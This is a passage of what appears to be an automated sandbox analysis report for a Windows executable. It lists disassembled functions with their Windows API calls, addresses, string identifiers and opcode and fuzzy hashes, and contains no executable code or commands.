                                                                                                                                                                  • Instruction Fuzzy Hash: 03918CB46183029FCB10DF24C485A5AB7F8EF89704F14486DF98A9B362DB31E945CB52
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E3BCF: _wcscpy.LIBCMT ref: 001E3BF2
                                                                                                                                                                  • _memset.LIBCMT ref: 00225E56
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?), ref: 00225E85
                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00225F31
                                                                                                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00225F5B
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 4152858687-4108050209
                                                                                                                                                                  • Opcode ID: de042aa983be7f7275c8c8cc475dc38e7af16b61a1b0fdae83f165f723dd5365
                                                                                                                                                                  • Instruction ID: d25560b965934b9f78cf80308a344be58bfa7edab749f8e6b8f3ccaf2eb9e3be
                                                                                                                                                                  • Opcode Fuzzy Hash: de042aa983be7f7275c8c8cc475dc38e7af16b61a1b0fdae83f165f723dd5365
                                                                                                                                                                  • Instruction Fuzzy Hash: BD511531534B32BBD3149FA8E9446ABB7E4AF56360F088529F891D31D1DBB0CD64C792
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 002210B8
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002210EE
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 002210FF
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00221181
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$CreateInstance
                                                                                                                                                                  • String ID: DllGetClassObject
                                                                                                                                                                  • API String ID: 2994846969-1075368562
                                                                                                                                                                  • Opcode ID: 44c91d8a3ffc74a42d896f03e426f9b233326fa24040c9fff6a03aa8ce63c247
                                                                                                                                                                  • Instruction ID: 512ad9c0c9d3302b4f7c26e2a3478aaa89e9c2a8d1a59e7f480fa848db53684a
                                                                                                                                                                  • Opcode Fuzzy Hash: 44c91d8a3ffc74a42d896f03e426f9b233326fa24040c9fff6a03aa8ce63c247
                                                                                                                                                                  • Instruction Fuzzy Hash: F9418971620228FFDB15CF94D884E9A7BA9EF55350B1081A9EA099F209D7B0DD74CBA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00225A93
                                                                                                                                                                  • GetMenuItemInfoW.USER32 ref: 00225AAF
                                                                                                                                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00225AF5
                                                                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002A18F0,00000000), ref: 00225B3E
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 1173514356-4108050209
                                                                                                                                                                  • Opcode ID: 51e1456388d303cb8929c3f7b9ee1af5925d90fd91a1e2c9fbea2359671cddf7
                                                                                                                                                                  • Instruction ID: 0048d1aa2bca5e19ec470a0d37b5f5334bdf67abebf1a4eec9f1f94a4cf4e1e9
                                                                                                                                                                  • Opcode Fuzzy Hash: 51e1456388d303cb8929c3f7b9ee1af5925d90fd91a1e2c9fbea2359671cddf7
                                                                                                                                                                  • Instruction Fuzzy Hash: 1941D331214722BFD710DF64E884B1AB7E8EF89318F04861DF9559B2D1D770E854CB62
                                                                                                                                                                  APIs
                                                                                                                                                                  • CharLowerBuffW.USER32(?,?,?,?), ref: 00240478
                                                                                                                                                                    • Part of subcall function 001E7F40: _memmove.LIBCMT ref: 001E7F8F
                                                                                                                                                                    • Part of subcall function 001EA2FB: _memmove.LIBCMT ref: 001EA33D
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove$BuffCharLower
                                                                                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                  • API String ID: 2411302734-567219261
                                                                                                                                                                  • Opcode ID: fbedc8b2bc6b1dc0d8fad2707d3ae71c2298938635ce5d13cb73a2e87ed38bfb
                                                                                                                                                                  • Instruction ID: 6e24c17788337f682ecf316d2320aa9ddc4af5a89dbe667623088e77f9072d06
                                                                                                                                                                  • Opcode Fuzzy Hash: fbedc8b2bc6b1dc0d8fad2707d3ae71c2298938635ce5d13cb73a2e87ed38bfb
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C31E67051061AAFCF04EF58D8809EEB3B5FF24750F508A29E562AB2D1DB71E956CF40
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0021C684
                                                                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0021C697
                                                                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 0021C6C7
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$_memmove
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 458670788-1403004172
                                                                                                                                                                  • Opcode ID: a907b224d7c2d4108b5c9b0ee92ff6bdd808b4071930751b044f23c2b11cb823
                                                                                                                                                                  • Instruction ID: c3b228b8411bbb9fdb83930424e74cccc4d504ea8cdf0cd50fe719f0edcb3973
                                                                                                                                                                  • Opcode Fuzzy Hash: a907b224d7c2d4108b5c9b0ee92ff6bdd808b4071930751b044f23c2b11cb823
                                                                                                                                                                  • Instruction Fuzzy Hash: 8E210476950148BEDB04AB64DC95DFEB7ACDFA2310B208119F426E31E0DBB44D9A9B10
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001E31DA
                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00226A2B
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 00226A49
                                                                                                                                                                    • Part of subcall function 00226D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00226DBA
                                                                                                                                                                    • Part of subcall function 00226D6D: GetLastError.KERNEL32 ref: 00226DC5
                                                                                                                                                                    • Part of subcall function 00226D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00226DD9
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00226AA4
                                                                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 00226B0C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$AttributesCreateDirectoryErrorFullLastNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                  • API String ID: 3499371447-1173974218
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00234A60
                                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00234A86
                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00234AB6
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00234AFD
                                                                                                                                                                    • Part of subcall function 002356A9: GetLastError.KERNEL32(?,?,00234A2B,00000000,00000000,00000001), ref: 002356BE
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1951874230-3916222277
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0025454E
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • _memset.LIBCMT ref: 001E3965
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 001E39B5
                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001E39C6
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                                  • String ID: Line:
                                                                                                                                                                  • API String ID: 3942752672-1585850449
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 001FC657
                                                                                                                                                                    • Part of subcall function 001FC619: GetStockObject.GDI32(00000011), ref: 001FC66B
                                                                                                                                                                    • Part of subcall function 001FC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 001FC675
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00248F69
                                                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00248F70
                                                                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00248F85
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00248F8D
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                                  • String ID: SysAnimate32
                                                                                                                                                                  • API String ID: 4146253029-1011021900
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0022E392
                                                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 0022E3E6
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0022E3FF
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,0027DBF0), ref: 0022E43D
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                  • String ID: %lu
                                                                                                                                                                  • API String ID: 3164766367-685833217
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                    • Part of subcall function 0021D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0021D640
                                                                                                                                                                    • Part of subcall function 0021D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0021D653
                                                                                                                                                                    • Part of subcall function 0021D623: GetCurrentThreadId.KERNEL32 ref: 0021D65A
                                                                                                                                                                    • Part of subcall function 0021D623: AttachThreadInput.USER32(00000000), ref: 0021D661
                                                                                                                                                                  • GetFocus.USER32 ref: 0021D7FB
                                                                                                                                                                    • Part of subcall function 0021D66C: GetParent.USER32(?), ref: 0021D67A
                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0021D844
                                                                                                                                                                  • EnumChildWindows.USER32(?,0021D8BA), ref: 0021D86C
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0021D886
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                                                  • String ID: %s%d
                                                                                                                                                                  • API String ID: 1941087503-1110647743
                                                                                                                                                                  • Opcode ID: dbe48dd02c6e21288be9803c77623e36b4ecbf4a07c6ca3c8a5012ef7a96aea4
                                                                                                                                                                  • Instruction ID: e2aea3c9abafeb9925b2e26d459962281852733e497b5ec6ded41db324a33ecd
                                                                                                                                                                  • Opcode Fuzzy Hash: dbe48dd02c6e21288be9803c77623e36b4ecbf4a07c6ca3c8a5012ef7a96aea4
                                                                                                                                                                  • Instruction Fuzzy Hash: D311E471610209ABDF11BF50EC89FEE37ACAF64704F0080B5FE09AA086DBB459958B70
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002418E4
                                                                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00241917
                                                                                                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00241A3A
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00241AB0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2364364464-0
                                                                                                                                                                  • Opcode ID: bd17f114396db880eaf6e7bd0234997bcda3396cd57cfc064115fe717b3dfd20
                                                                                                                                                                  • Instruction ID: 12cf7ef75b0a10dcbcafd55ae04f739bcd39e0874f1207f3eb6b8a8dd72fee9c
                                                                                                                                                                  • Opcode Fuzzy Hash: bd17f114396db880eaf6e7bd0234997bcda3396cd57cfc064115fe717b3dfd20
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E81B071A50219ABDF14DF64C886BADBBF5AF48720F048059F909AF382D7B5E950CB90
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 002405DF
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,?,?,?,00000004,00000004,?,?), ref: 0024066E
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,00000000,00000004,00000004,?,?), ref: 0024068C
                                                                                                                                                                  • 6C1F6DE0.KERNEL32(00000000,?,?,?,00000041,00000004), ref: 002406D2
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 002406EC
                                                                                                                                                                    • Part of subcall function 001FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0022AEA5,?,?,00000000,00000008), ref: 001FF282
                                                                                                                                                                    • Part of subcall function 001FF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0022AEA5,?,?,00000000,00000008), ref: 001FF2A6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2773980681-0
                                                                                                                                                                  • Opcode ID: 953c9336da1fbda47bd26430fa1bf6684527b4e81706af78efe200fee56daa50
                                                                                                                                                                  • Instruction ID: 683ade7d86d31021e26df1f6ca050f0857c46d435279264ce419dac6a0291290
                                                                                                                                                                  • Opcode Fuzzy Hash: 953c9336da1fbda47bd26430fa1bf6684527b4e81706af78efe200fee56daa50
                                                                                                                                                                  • Instruction Fuzzy Hash: D751AB75A006069FCB04EFA8C894DADF7B9FF58310B1580A9EA16AB351DB70ED51CF80
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f6963f6d006ac7d275df695d299974d19f678e43375d619b3fc6717e9032b37e
                                                                                                                                                                  • Instruction ID: ae0c90961cab18c91d6ad0e1b4e9e800670b736b10643d7a9617c6ae39e5cad9
                                                                                                                                                                  • Opcode Fuzzy Hash: f6963f6d006ac7d275df695d299974d19f678e43375d619b3fc6717e9032b37e
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D412639E21105AFD768DF7CDC89FA9BB69EB09320F244156F819A72D1C7B09D20DA50
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002317D4
                                                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002317FD
                                                                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0023183C
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00231861
                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00231869
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1389676194-0
                                                                                                                                                                  • Opcode ID: 997f495c1979195d0a6396761b8590fd918ffbca36bf4496f8a2732ec9ed5259
                                                                                                                                                                  • Instruction ID: 1ffabdc8d3ee86a6db63aef6eb07e3a075aef108afb2f3afec6f6f53928eed9f
                                                                                                                                                                  • Opcode Fuzzy Hash: 997f495c1979195d0a6396761b8590fd918ffbca36bf4496f8a2732ec9ed5259
                                                                                                                                                                  • Instruction Fuzzy Hash: 15411A75A00609DFDB01EF65C995AADBBF5FF08310B148099E809AB3A2DB31ED11DF51
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCursorPos.USER32(000000FF), ref: 001FB749
                                                                                                                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 001FB766
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 001FB78B
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 001FB799
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4210589936-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00243C92
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00243D71
                                                                                                                                                                    • Part of subcall function 00243C63: FreeLibrary.KERNEL32(?), ref: 00243D2B
                                                                                                                                                                    • Part of subcall function 00243C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00243D4E
                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00243D16
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumFreeLibrary$Delete
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1943264518-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0021C156
                                                                                                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 0021C200
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0021C208
                                                                                                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 0021C216
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0021C21E
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3382505437-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0021E9CD
                                                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0021E9EA
                                                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0021EA22
                                                                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0021EA48
                                                                                                                                                                  • _wcsstr.LIBCMT ref: 0021EA52
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3902887630-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 001FAF8E
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0024DCC0
                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0024DCE4
                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0024DCFC
                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 0024DD24
                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0023407D,00000000), ref: 0024DD42
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2294984445-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0021CA86
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0021CAB8
                                                                                                                                                                  • __itow.LIBCMT ref: 0021CAD0
                                                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0021CAF6
                                                                                                                                                                  • __itow.LIBCMT ref: 0021CB07
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$__itow$_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2983881199-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindow.USER32(00000000), ref: 002389CE
                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 002389E5
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00238A21
                                                                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00238A2D
                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00238A68
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4156661090-0
                                                                                                                                                                  • Opcode ID: 0565e72747db9ff3b8a47f8c0f683898442a603a9decda2eab9d08adb96ff46d
                                                                                                                                                                  • Instruction ID: a4f9f38dbadda55fb0c6cbc3825fc89f8129b718442f91d39c473343177df7af
                                                                                                                                                                  • Opcode Fuzzy Hash: 0565e72747db9ff3b8a47f8c0f683898442a603a9decda2eab9d08adb96ff46d
                                                                                                                                                                  • Instruction Fuzzy Hash: 17216275A00204AFDB00EFA5DD89AAABBF9EF48705F05C479E94A97351CB70AD01CB90
                                                                                                                                                                  APIs
                                                                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 001FB5EB
                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 001FB5FA
                                                                                                                                                                  • BeginPath.GDI32(?), ref: 001FB611
                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 001FB63B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3225163088-0
                                                                                                                                                                  • Opcode ID: 598b1ced612ca8cca8a505b4b4f9bab86d134c63b7f3198636fd53844870322e
                                                                                                                                                                  • Instruction ID: f63eb5d51109a3cd6d7f9851db6fc95db0c7a2c5e5e8ef2df3b028b7ec5ded14
